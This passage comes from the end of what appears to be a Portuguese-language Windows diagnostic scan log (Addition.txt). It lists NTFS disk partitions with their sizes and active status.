Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=68.3 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=397.4 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (Size: 931.5 GB) (Disk ID: F6E2412F) Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS) ==================== Fim de Addition.txt ============================